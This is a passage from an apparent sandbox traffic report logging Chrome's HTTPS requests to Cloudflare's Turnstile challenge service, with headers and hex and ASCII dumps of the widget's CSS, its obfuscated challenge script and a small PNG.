                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                        Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                        Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                        Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                        Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                        Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                        Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.449750104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:19 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5a5a47e0643e9&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:19 UTC301INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:19 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 127555
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5ae3aac19cb-EWR
                                                                                        2024-10-02 15:15:19 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 25 32 32 25 33 45 52 65 66 72 65 73 68 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22
                                                                                        Data Ascii: %22%3ERefresh%3C%2Fa%3E","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_success":"Success%21","turnstile_refresh":"Refresh","turnstile_expired":"Expired","turnstile_feedback_description":"Send%20Feedback","
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 65 49 6e 74 28 67 48 28 31 36 36 38 29 29 2f 31 31 2a 28 70 61 72 73 65 49 6e 74 28 67 48 28 37 31 36 29 29 2f 31 32 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 30 32 35 34 37 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 32 36 30 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 70 6b 45 4c 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 76 61 6d 66 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 27
                                                                                        Data Ascii: eInt(gH(1668))/11*(parseInt(gH(716))/12),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,602547),eM=this||self,eN=eM[gI(1260)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'pkELX':function(h,i){return h==i},'vamfu':function(h,i){return i^h},'
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 26 68 7d 2c 27 66 78 76 65 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 64 5a 78 6c 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4c 71 72 50 47 27 3a 67 4a 28 31 36 34 34 29 2c 27 75 49 73 59 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 73 62 57 4c 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 50 47 47 54 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 43 77 4f 4e 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6f 66 45 43 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65
                                                                                        Data Ascii: &h},'fxveZ':function(h,i){return h<<i},'dZxln':function(h,i){return i==h},'LqrPG':gJ(1644),'uIsYS':function(h,i){return i==h},'sbWLq':function(h,i){return h!=i},'PGGTw':function(h,i){return h(i)},'CwONi':function(h,i){return h(i)},'ofECc':function(h,i){re
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 69 6f 6e 28 4f 2c 50 2c 67 54 29 7b 72 65 74 75 72 6e 20 67 54 3d 62 2c 64 5b 67 54 28 31 35 35 36 29 5d 28 4f 2c 50 29 7d 2c 27 76 4c 4f 76 54 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 67 55 29 7b 72 65 74 75 72 6e 20 67 55 3d 62 2c 64 5b 67 55 28 31 35 30 36 29 5d 28 4f 2c 50 29 7d 2c 27 54 78 61 56 58 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 5e 4f 7d 2c 27 62 49 7a 77 76 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 67 56 29 7b 72 65 74 75 72 6e 20 67 56 3d 62 2c 64 5b 67 56 28 31 36 38 39 29 5d 28 4f 2c 50 29 7d 2c 27 73 57 69 73 74 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 5e 50 7d 2c 27 69 57 57 68 47 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 67 57 29 7b 72 65 74 75 72 6e 20 67 57 3d
                                                                                        Data Ascii: ion(O,P,gT){return gT=b,d[gT(1556)](O,P)},'vLOvT':function(O,P,gU){return gU=b,d[gU(1506)](O,P)},'TxaVX':function(O,P){return P^O},'bIzwv':function(O,P,gV){return gV=b,d[gV(1689)](O,P)},'sWist':function(O,P){return O^P},'iWWhG':function(O,P,gW){return gW=
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 33 28 31 35 32 36 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 68 33 28 31 38 39 38 29 5d 28 38 2c 78 29 3b 49 3d 4e 26 31 2e 35 7c 49 3c 3c 31 2c 4a 3d 3d 64 5b 68 33 28 31 32 35 30 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 33 28 31 31 38 39 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 64 5b 68 33 28 31 33 36 32 29 5d 28 78 2c 47 29 3b 49 3d 49 3c 3c 31 2e 38 37 7c 4e 2c 64 5b 68 33 28 31 38 34 39 29 5d 28 4a 2c 64 5b 68 33 28 31 34 39 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 33 28 31 31 38 39 29 5d 28 64 5b 68 33 28 31 30 32 30 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30
                                                                                        Data Ascii: ):J++,x++);for(N=D[h3(1526)](0),x=0;d[h3(1898)](8,x);I=N&1.5|I<<1,J==d[h3(1250)](j,1)?(J=0,H[h3(1189)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;d[h3(1362)](x,G);I=I<<1.87|N,d[h3(1849)](J,d[h3(1490)](j,1))?(J=0,H[h3(1189)](d[h3(1020)](o,I)),I=0):J++,N=0
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 29 5d 28 31 39 34 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 32 34 35 29 2b 32 35 36 2c 32 35 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 57 3d 48 5b 68 33 28 31 36 35 36 29 5d 28 32 2c 73 5b 68 33 28 34 38 31 29 5d 28 73 5b 68 33 28 34 35 33 29 5d 28 56 2c 32 35 35 29 3c 3c 34 2e 30 35 2c 73 5b 68 33 28 34 37 35 29 5d 28 61 30 2c 34 29 29 2d 31 30 32 33 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 61 30 3d 73 5b 68 33 28 31 31 33 30 29 5d 28 74 68 69 73 2e 68 5b 31 39 34 5e 74 68 69 73 2e 67 5d 5b 33 5d 2c 73 5b 68 33 28 31 32 30 30 29 5d 28 73 5b 68 33 28 38 35 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 39 34 2e 34 31 5d 5b 31 5d 5b 68 33 28 31 35 32 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e
                                                                                        Data Ascii: )](194,this.g)][0]++),245)+256,255));continue;case'3':W=H[h3(1656)](2,s[h3(481)](s[h3(453)](V,255)<<4.05,s[h3(475)](a0,4))-1023);continue;case'4':a0=s[h3(1130)](this.h[194^this.g][3],s[h3(1200)](s[h3(856)](this.h[this.g^194.41][1][h3(1526)](this.h[this.g^
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2d 32 34 35 2c 32 35 36 29 26 32 35 35 2e 36 36 2c 56 5b 33 5d 3d 74 68 69 73 2e 68 5b 73 5b 68 33 28 31 38 38 37 29 5d 28 31 39 34 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 73 5b 68 33 28 31 32 30 30 29 5d 28 74 68 69 73 2e 68 5b 73 5b 68 33 28 36 31 38 29 5d 28 31 39 34 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 33 28 31 35 32 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 39 34 5d 5b 30 5d 2b 2b 29 2d 32 34 35 2c 32 35 36 29 26 32 35 35 5e 32 30 35 2e 38 35 2c 56 29 3b 65 6c 73 65 20 69 66 28 73 5b 68 33 28 31 38 36 35 29 5d 28 32 31 33 2c 56 29 29 7b 66 6f 72 28 56 3d 43 28 74 68 69 73 29 2c 57 3d 5b 5d 2c 5a 3d 30 3b 73 5b 68 33 28 31 36 33 33 29 5d 28 5a 2c 56 29 3b 57 5b 68 33 28 31 31 38 39 29 5d 28 73 5b
                                                                                        Data Ascii: his.g][0]++)-245,256)&255.66,V[3]=this.h[s[h3(1887)](194,this.g)][3]^s[h3(1200)](this.h[s[h3(618)](194,this.g)][1][h3(1526)](this.h[this.g^194][0]++)-245,256)&255^205.85,V);else if(s[h3(1865)](213,V)){for(V=C(this),W=[],Z=0;s[h3(1633)](Z,V);W[h3(1189)](s[
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 2e 67 5d 2c 53 3d 51 5b 68 33 28 39 33 34 29 5d 28 29 2c 74 68 69 73 2e 68 5b 53 5e 74 68 69 73 2e 67 5d 3d 52 2c 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 35 35 5d 5b 68 33 28 31 33 39 36 29 5d 28 51 5b 68 33 28 39 33 34 29 5d 28 29 29 3b 65 6c 73 65 7b 69 66 28 64 5b 68 33 28 39 30 33 29 5d 28 32 35 36 2c 44 5b 68 33 28 31 35 32 36 29 5d 28 30 29 29 29 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 4a 3d 3d 64 5b 68 33 28 31 34 39 30 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 33 28 31 31 38 39 29 5d 28 64 5b 68 33 28 38 37 35 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 33 28 31 35 32 36 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 31 2e 37 33 26 4e 7c 49 3c 3c 31 2e 31 36 2c 64 5b 68
                                                                                        Data Ascii: .g],S=Q[h3(934)](),this.h[S^this.g]=R,this.h[this.g^55][h3(1396)](Q[h3(934)]());else{if(d[h3(903)](256,D[h3(1526)](0))){for(x=0;x<G;I<<=1,J==d[h3(1490)](j,1)?(J=0,H[h3(1189)](d[h3(875)](o,I)),I=0):J++,x++);for(N=D[h3(1526)](0),x=0;8>x;I=1.73&N|I<<1.16,d[h
                                                                                        2024-10-02 15:15:19 UTC1369INData Raw: 5d 28 32 2c 38 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 36 28 31 35 30 39 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 36 28 31 31 33 33 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 68 36 28 37 30 31 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 36 28 31 36 35 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 36 28 31 38 31 36 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 36 28 31 34 33 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 36 28 31 33 36 32 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31
                                                                                        Data Ascii: ](2,8),F=1;F!=K;L=H&G,H>>=1,d[h6(1509)](0,H)&&(H=j,G=o(I++)),J|=d[h6(1133)](0<L?1:0,F),F<<=1);M=d[h6(701)](e,J);break;case 1:for(J=0,K=Math[h6(1656)](2,16),F=1;d[h6(1816)](F,K);L=H&G,H>>=1,H==0&&(H=j,G=d[h6(1432)](o,I++)),J|=(d[h6(1362)](0,L)?1:0)*F,F<<=1


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.449751104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:19 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:19 UTC210INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:19 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5b0ceb62394-EWR
                                                                                        2024-10-02 15:15:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.449754104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:20 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5a5a47e0643e9&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
